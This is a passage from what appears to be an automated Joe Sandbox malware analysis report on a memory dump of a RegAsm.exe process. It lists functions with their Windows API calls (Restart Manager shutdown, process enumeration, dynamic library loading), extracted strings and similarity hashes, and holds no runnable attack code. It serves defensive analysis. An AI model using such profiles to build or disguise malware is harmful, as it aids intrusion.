FreeLibrary.KERNEL32(00000000,?,0044B48D,?,?,00000000,00000001,?,?,0044B6B7,00000022,FlsSetValue,00561B88,00561B90,00000001), ref: 0044B43F

Strings

api-ms-, xrefs: 0044B3D5
ext-ms-, xrefs: 0044B3E9

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 033630484f002e070c94113c7b6ef7f262f68e90d70309fdd043a749aa00ed93
Instruction ID: e3d7dbf8d3e43151f67a2d3675c4fcd7809fc0c9af6198dcb17880ded4e1cd5b
Opcode Fuzzy Hash: 033630484f002e070c94113c7b6ef7f262f68e90d70309fdd043a749aa00ed93
Instruction Fuzzy Hash: A2212B36A01220A7E7319F619C45A6B7768EB51761F140112FC06A7392D734ED05D6D9

Function 00458023 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0045809E,00458247), ref: 0045803A
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00458050
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00458065

Strings

ReleaseSRWLockExclusive, xrefs: 0045805A
AcquireSRWLockExclusive, xrefs: 0045804A
KERNEL32.DLL, xrefs: 00458035

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: b8fd12eac23ddbaee97a23d952f9025b2fd48530103b998c3f924386a52c0e98
Instruction ID: 9d8da08feb674b7e1defcd418174b7d342a7e101b9a5f06a55684ee540db6b02
Opcode Fuzzy Hash: b8fd12eac23ddbaee97a23d952f9025b2fd48530103b998c3f924386a52c0e98
Instruction Fuzzy Hash: C6F0A4316807129B5B715E755C9827736DCAA11B53716003EDF01F32E2FE18CC4EA795

Function 004D6D90 Relevance: 9.1, APIs: 6, Instructions: 101COMMON

Download Yara Rule

APIs

RmStartSession.RSTRTMGR(?,00000000,?), ref: 004D6DDE
RmRegisterResources.RSTRTMGR(?,00000001,?,00000000,00000000,00000000,00000000,?), ref: 004D6E20
RmGetList.RSTRTMGR(?,?,?,?,?), ref: 004D6E48
RmShutdown.RSTRTMGR(?,00000001,00000000), ref: 004D6E69
RmEndSession.RSTRTMGR(?), ref: 004D6E9C
SetLastError.KERNEL32(00000000), ref: 004D6EA3

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Session$ErrorLastListRegisterResourcesShutdownStart
String ID:
API String ID: 3915309458-0
Opcode ID: 35964b7dd5ed9eaca30dcc906b780c94db694ea61ce3b36c4f9fa18b6ac6bce6
Instruction ID: 29e6430877ba3f7b480c4ad8311182fb53b3682ab34aef7614a715581ba20f86
Opcode Fuzzy Hash: 35964b7dd5ed9eaca30dcc906b780c94db694ea61ce3b36c4f9fa18b6ac6bce6
Instruction Fuzzy Hash: 42316076C01219AFDB21DF94CC55BEFBBB8EF18310F01422AF911A3290DB795A448BE1

Function 00448E9F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(495F3D5D,00000000,00000000,?), ref: 00448F02

Part of subcall function 0044EC55: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0044A862,?,00000000,-00000008), ref: 0044ECB6

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00449154
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0044919A
GetLastError.KERNEL32 ref: 0044923D

Strings

]=_I, xrefs: 00448EB5

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID: ]=_I
API String ID: 2112829910-112444943
Opcode ID: d46c0870a8277536d77cd1fa32924c999241811f2f15ebdbc3735bbe4b8907ba
Instruction ID: b6f9ea87837ca93654473fd2bae4ec290e60b55bc3ade45d2d9d29a5185f0d60
Opcode Fuzzy Hash: d46c0870a8277536d77cd1fa32924c999241811f2f15ebdbc3735bbe4b8907ba
Instruction Fuzzy Hash: 70D1BC75D00249AFDF14CFA8C880AAEBBB5FF09304F28456AE856EB351D734AD45CB54

Function 00437458 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043744F,0043599C,00434361), ref: 00437466
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437474
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043748D
SetLastError.KERNEL32(00000000,0043744F,0043599C,00434361), ref: 004374DF

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1f7d8f03dc5d5ed9cbe3f3a50d497af2707fd42e27fe0bf67e220eaf0f6c3ecd
Instruction ID: 2a60fb784f2f832ea5b73717e43a0c16eb42b58da7a2c3196cfaa8111b53b8ed
Opcode Fuzzy Hash: 1f7d8f03dc5d5ed9cbe3f3a50d497af2707fd42e27fe0bf67e220eaf0f6c3ecd
Instruction Fuzzy Hash: F401F57210C7116EE63027756C8A6172B84DB693BAF30633FF894512F1FE195C04628C

Function 0043756F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00437636
___AdjustPointer.LIBCMT ref: 00437659
___AdjustPointer.LIBCMT ref: 004376F5

Strings

`-@, xrefs: 004375CE

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: AdjustPointer
String ID: `-@
API String ID: 1740715915-3781167437
Opcode ID: 9c49ec1216cd10a1b8dcded1df3eff29d3c2c71fb51b80305b9040516556d7e1
Instruction ID: 05bfd451ac5aa057a102673f7c5ee37241370c5a2d72e881bccf1d550ae62a18
Opcode Fuzzy Hash: 9c49ec1216cd10a1b8dcded1df3eff29d3c2c71fb51b80305b9040516556d7e1
Instruction Fuzzy Hash: CE5125F1608A02AFDB388F19C852BBB77A5EF08324F14542FE881472A1D739EC50CB58

Function 00545140 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?), ref: 00545190
GetTempPathW.KERNEL32(000000E6,?), ref: 005451B9

Strings

>, xrefs: 00545298
%s\etilqs_, xrefs: 0054525A

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: PathTempVersion
String ID: %s\etilqs_$>
API String ID: 261301950-2315843240
Opcode ID: ce0a7f2363ab7b7d7abc17a902d21cc4fb793d200454f9d166eb27a7e0bd6095
Instruction ID: d7a7f50afb807603cb5ab0f28f8cfab7bdc2795ddb654ce58a8a7a184e52c6c9
Opcode Fuzzy Hash: ce0a7f2363ab7b7d7abc17a902d21cc4fb793d200454f9d166eb27a7e0bd6095
Instruction Fuzzy Hash: 8D516B31D086989FE722CB798C457FABFA4BF16308F4809D6D58492083E6B48F85D761

Function 00432729 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00432730
std::_Lockit::_Lockit.LIBCPMT ref: 0043273B
std::_Lockit::~_Lockit.LIBCPMT ref: 004327A9

Part of subcall function 0043288C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 004328A4

std::locale::_Setgloballocale.LIBCPMT ref: 00432756

Strings

`-@, xrefs: 00432778, 0043279C

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID: `-@
API String ID: 677527491-3781167437
Opcode ID: 8a5613631ec3d916f95b396eb7cc43f12c5d676d84142dd5ef1a29976cc47206
Instruction ID: 335728d06f8999c9367bb6f0cb93ad347570f0e44e9dcbef2930aaa8ccdcd417
Opcode Fuzzy Hash: 8a5613631ec3d916f95b396eb7cc43f12c5d676d84142dd5ef1a29976cc47206
Instruction Fuzzy Hash: 9D01FC35A006109BC70AFB20CC5157D7BB0FF98790F44250EE81163391CFB8AE06DB89

Function 004E9A70 Relevance: 7.7, APIs: 5, Instructions: 181memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,74DEE010,?), ref: 004E9BEE
GetProcAddress.KERNEL32(00000000,?), ref: 004E9BF9
GetProcessHeap.KERNEL32 ref: 004E9C04
HeapAlloc.KERNEL32(00000000,00000000,00010000), ref: 004E9C1E
HeapAlloc.KERNEL32(?,00000000,00010000), ref: 004E9C57

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Heap$Alloc$AddressHandleModuleProcProcess
String ID:
API String ID: 349456774-0
Opcode ID: 13763fb7ed65d7034848c90db75977a8d0748b960893ffa14e62b2712247cb23
Instruction ID: d3ba1316c3404c5ffc03a5be9701c45b2826e37c75856fc641be7cc60fa5c5e8
Opcode Fuzzy Hash: 13763fb7ed65d7034848c90db75977a8d0748b960893ffa14e62b2712247cb23
Instruction Fuzzy Hash: CF81F0B5D04229ABDB14CF9AD884AAEFBB4FF48311F10856AE924B7350E7746A01CF54

Function 00544B20 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00545330: GetVersionExA.KERNEL32(?), ref: 00545356

GetVersionExA.KERNEL32(?), ref: 00544B51
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00544B76
GetFullPathNameW.KERNEL32(00000000,00000003,00000000,00000000), ref: 00544B96
GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00544BAF
GetFullPathNameA.KERNEL32(00000000,00000003,00000000,00000000), ref: 00544BE1

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: FullNamePath$Version
String ID:
API String ID: 495861893-0
Opcode ID: def506589b02ed86a2d83c6155d8a90f1111383d037ff91711d2ded9672cc6f4
Instruction ID: d9a042031f5a76925af0b002eaae0799fce7b88889afc6fe8005c9c8c5fb2dd0
Opcode Fuzzy Hash: def506589b02ed86a2d83c6155d8a90f1111383d037ff91711d2ded9672cc6f4
Instruction Fuzzy Hash: 55213FB25406146BEB206F719C86FEF3B68EF51309F000078F90956252EA38DD49C7A6

Function 0048F4D0 Relevance: 7.6, APIs: 5, Instructions: 69processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0048F4E3
Process32First.KERNEL32(00000000,?), ref: 0048F506
Process32Next.KERNEL32(00000000,00000128), ref: 0048F551
CloseHandle.KERNEL32(00000000), ref: 0048F55C
CloseHandle.KERNEL32(00000000), ref: 0048F572

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 1789362936-0
Opcode ID: 6029d90057008e46b8e5c5277aed6df356708134237ca5f417d9c8706b6c6cea
Instruction ID: bc177564cbddbd99672fb84a339279b73cca850227e520494dfef4c47b8580b0
Opcode Fuzzy Hash: 6029d90057008e46b8e5c5277aed6df356708134237ca5f417d9c8706b6c6cea
Instruction Fuzzy Hash: 6411E6326001146BD7306F34AC986BFB7B9EB19325F1405BAE848C3352E7268C4E8765

Function 00406180 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 353COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00406587

Strings

)@, xrefs: 00406581
", ", xrefs: 004063D8
: ", xrefs: 004063AE

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: )@$", "$: "
API String ID: 4194217158-2520320562
Opcode ID: 87b3e6f96fc286b706f65f79a11516f46433cb96e0d5d387709f7d993ef0e404
Instruction ID: 193815703dc37f45cda184aa0d75e7307a57ae547af4f9c577389d6cf834964f
Opcode Fuzzy Hash: 87b3e6f96fc286b706f65f79a11516f46433cb96e0d5d387709f7d993ef0e404
Instruction Fuzzy Hash: 85D1E370D00205DFCB14DFA8C945AAEBBF5FF44304F10462EE456A7381DB78AA55CB99

Function 0044A6B7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 0044A86C

Part of subcall function 0044B094: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00434B3F,?,?,74D723A0,?,?,00403522,?,?), ref: 0044B0C6

__freea.LIBCMT ref: 0044A87F
__freea.LIBCMT ref: 0044A88C

Strings

]=_I, xrefs: 0044A6BE

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: __freea$AllocateHeap
String ID: ]=_I
API String ID: 2243444508-112444943
Opcode ID: 921cd7e01d8526e855b8fd5ac28023669454faf53a6c1b7d91dbaf52dc63e81a
Instruction ID: f5595610a76fd0fe7a1ac72e8dd05aa978e6d4ea887cdcbb47aae7901e41c041
Opcode Fuzzy Hash: 921cd7e01d8526e855b8fd5ac28023669454faf53a6c1b7d91dbaf52dc63e81a
Instruction Fuzzy Hash: 4151A572540106AFFB246E668C85EBB77A9EF84354B15052EFD04D7211EB38DC2186AA

Function 00407350 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040750C
___std_exception_destroy.LIBVCRUNTIME ref: 00407522

Strings

[json.exception., xrefs: 004073A1
)@, xrefs: 00407502, 0040751C

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: )@$[json.exception.
API String ID: 4194217158-3378332251
Opcode ID: 3685d54feecdbec0118102e06bcf9a25a1c6c36fc902adf6c93199d749d8fd51
Instruction ID: d1fd1ad00dbeab1566b73d8112c34bc80c76f551163e59ed82d928a5322bc1a2
Opcode Fuzzy Hash: 3685d54feecdbec0118102e06bcf9a25a1c6c36fc902adf6c93199d749d8fd51
Instruction Fuzzy Hash: 8C51CFB1C046489BD710DFA8C905B9EBBB4FF15318F14426EE850A73C2E7B86A44C7A5

Function 00407B10 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00407CAC
___std_exception_destroy.LIBVCRUNTIME ref: 00407CC2

Strings

)@, xrefs: 00407CA2, 00407CBC
p|@, xrefs: 00407C2A

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: )@$p|@
API String ID: 4194217158-2759249158
Opcode ID: a7df525659f08725069451ef56f143dfc49da7a45c29d5168f8b7bad953b205d
Instruction ID: 2d5fa3d367423be86db8b91485125f203ee18fb15550ca5d49c40f7a3d1822d9
Opcode Fuzzy Hash: a7df525659f08725069451ef56f143dfc49da7a45c29d5168f8b7bad953b205d
Instruction Fuzzy Hash: 0051D3B1C052489BDB00DF98D9457DEFBF4EF19318F10426EE814A7381E7B96A44C7A5

Function 00437B6B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00437B90
CatchIt.LIBVCRUNTIME ref: 00437C76

Strings

MOC, xrefs: 00437BA2
RCC, xrefs: 00437BAA

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 2197aaef782f375f8d87615206ae6fe603a672c81450030c01d2018f2b0bfa53
Instruction ID: 1ed06b6d49ca92b7e67ab75acb14d1b1cdaab090b09ce00a5d54d3623121de76
Opcode Fuzzy Hash: 2197aaef782f375f8d87615206ae6fe603a672c81450030c01d2018f2b0bfa53
Instruction Fuzzy Hash: C1416AB1900209AFDF25DF94CD81AEEBBB5FF4C304F14A05AF944A7251D339A950DB54

Function 00404900 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040499F

Part of subcall function 004351FB: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,74D723A0,?,00431D09,?,005799D8,74D723A0,?,74D723A0,-00589880), ref: 0043525B

Strings

ios_base::failbit set, xrefs: 00404828, 00404941
ios_base::eofbit set, xrefs: 00404946
ios_base::badbit set, xrefs: 00404937, 00404962

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionIos_base_dtorRaisestd::ios_base::_
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1903096808-1866435925
Opcode ID: 5e8fcf04681b5496c91e096f1d273a5343178b8940b0c322b64de4dd1df32f3c
Instruction ID: 99c94d1e80f512c720ba00148ae48faeb0acee82eabb402b7e5943aa58dcc262
Opcode Fuzzy Hash: 5e8fcf04681b5496c91e096f1d273a5343178b8940b0c322b64de4dd1df32f3c
Instruction Fuzzy Hash: AC119CF2844644ABCB10DF688C03BAB37C8E744715F04463EFE58972C1EB399800C79A

Function 00450058 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0045007D
GetLastError.KERNEL32 ref: 00450087
__dosmaperr.LIBCMT ref: 0045008E

Strings

]=_I, xrefs: 00450063

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileLastModuleName__dosmaperr
String ID: ]=_I
API String ID: 4076908705-112444943
Opcode ID: 6fda5bd53087b7d41890ed0be84870b7a9bdaf95db66da9cc87908cee76a2d0e
Instruction ID: 82a08dcc6c6ed9dcc8610a1e16a3617c4d768d698b4e75be063529714b51e54e
Opcode Fuzzy Hash: 6fda5bd53087b7d41890ed0be84870b7a9bdaf95db66da9cc87908cee76a2d0e
Instruction Fuzzy Hash: C4115B7194021CABDB20DFA4EC4DBDEB7B8AB18305F1044DAA409E7241EA349A88CF58

Function 00438587 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00438538,00000000,?,00588904,?,?,?,004386DB,00000004,InitializeCriticalSectionEx,0055F640,InitializeCriticalSectionEx), ref: 00438594
GetLastError.KERNEL32(?,00438538,00000000,?,00588904,?,?,?,004386DB,00000004,InitializeCriticalSectionEx,0055F640,InitializeCriticalSectionEx,00000000,?,00438322), ref: 0043859E
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 004385C6

Strings

api-ms-, xrefs: 004385AB

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: c947551068fc5aa78d1c4ecff25818d243fe134ebcecfa929017a310edce328a
Instruction ID: c90ef5146fc35b23aa789d7ef59479731dd43e4d0f257fa83e9710a47c69997d
Opcode Fuzzy Hash: c947551068fc5aa78d1c4ecff25818d243fe134ebcecfa929017a310edce328a
Instruction Fuzzy Hash: 51E0D871280308B7EF301F60DC06B1A7F65AB10B41F100035F90CA85F0EB65E954A959

Function 0043361D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00433077,?,?,?,?,004C7E2F), ref: 00433655
GetSystemTimeAsFileTime.KERNEL32(?,495F3D5D,00000000,?,00551382,000000FF,?,00433077,?,?,?,?,004C7E2F), ref: 00433659

Strings

`-@, xrefs: 0043364F
]=_I, xrefs: 0043362F

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Time$FileSystem$Precise
String ID: ]=_I$`-@
API String ID: 743729956-4227831232
Opcode ID: a70e229828252f114f3dcb939b169fb3f53d7191ad82fa45b454faadf805d98c
Instruction ID: 3e04e591088ee8cc2650925c1d28f2227fba881fd4e87dc1a7d03300bd93dc66
Opcode Fuzzy Hash: a70e229828252f114f3dcb939b169fb3f53d7191ad82fa45b454faadf805d98c
Instruction Fuzzy Hash: 73F0A032904A54EFCB118F44DC11B59BBA8F708B21F004626EC12A3790DB34A9049F94

Function 004E97A0 Relevance: 6.2, APIs: 4, Instructions: 161libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?), ref: 004E98CE
GetProcAddress.KERNEL32(00000000,?), ref: 004E98DA
CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 004E9A55
SetEvent.KERNEL32(00000000), ref: 004E9A5C

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Event$AddressCreateHandleModuleProc
String ID:
API String ID: 2341598627-0
Opcode ID: d8f616207016ccd70649815b0a46d34ccb6368db7b539dbf58b9823ea8322156
Instruction ID: 94e94f94aa147367d366308f7bbda68d1ba073eefd2343970e9372381d670d86
Opcode Fuzzy Hash: d8f616207016ccd70649815b0a46d34ccb6368db7b539dbf58b9823ea8322156
Instruction Fuzzy Hash: 88819AB490C3829FC304CF59C48195AFBE5AFA8390F10891EF89587361E775D989CF96

Function 00443A09 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c28dd970ee9f985723d01587f791f28dc943c9d51e1efde8fb113aa15fde7f1a
Instruction ID: 3ce7a0f6481a0f72d6256d3f2a6e49e06ee9a16ea2b7f0bfddf77237ab23de3e
Opcode Fuzzy Hash: c28dd970ee9f985723d01587f791f28dc943c9d51e1efde8fb113aa15fde7f1a
Instruction Fuzzy Hash: 8F412872A40744AFF7149F39C841B5ABBA9EB48B11F10812FF051EB381D779EA408788

Function 004E55A0 Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 004E562F
MultiByteToWideChar.KERNEL32(0000000F,00000000,?,000000FF,00000000,0000000F), ref: 004E5664
WideCharToMultiByte.KERNEL32(000004E3,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 004E568B
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000), ref: 004E56B9

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 667af2e2a61abff60a43f7d208c8c753e65e9722df59284470c0eff5b9583b61
Instruction ID: 1f69569aec08140b5ab3c0a9b620ac8cfa37dccc0484cb5d57b15f637e29afd9
Opcode Fuzzy Hash: 667af2e2a61abff60a43f7d208c8c753e65e9722df59284470c0eff5b9583b61
Instruction Fuzzy Hash: ED41E271900345ABEF218F75CC09FAE7BB4AF45715F10025AF414BB2D1D7B99A04CBA9

Function 0044F9EC Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0044EC55: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0044A862,?,00000000,-00000008), ref: 0044ECB6

GetLastError.KERNEL32 ref: 0044FA50
__dosmaperr.LIBCMT ref: 0044FA57
GetLastError.KERNEL32(?,?,?,?), ref: 0044FA91
__dosmaperr.LIBCMT ref: 0044FA98

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: f69f264f3a3445fa5257163de56fc3005cb7e945df64431326a0965baf165f71
Instruction ID: 175cdc1e371479ca6662e8932d27d2c7f0366fb1f46f3a828fcae8f7a9953d28
Opcode Fuzzy Hash: f69f264f3a3445fa5257163de56fc3005cb7e945df64431326a0965baf165f71
Instruction Fuzzy Hash: 4A21D731A00605AFFB20EF66D88086BB7A9EF54368715843FF81DA7250D738EC598B59

Function 00545330 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?), ref: 00545356

Part of subcall function 00545D20: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,00545385), ref: 00545D36

AreFileApisANSI.KERNEL32 ref: 00545392
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 005453AB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000), ref: 005453D1

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$ApisFileVersion
String ID:
API String ID: 928063719-0
Opcode ID: cddb1f359b989beb9fa67faf323006f07cde4dd9abd9fb615a423bdc0bd7c05d
Instruction ID: ee91a8a6a0c0fee7022a5c8999e7185e4bdf2e494df521b14be47994331aebc0
Opcode Fuzzy Hash: cddb1f359b989beb9fa67faf323006f07cde4dd9abd9fb615a423bdc0bd7c05d
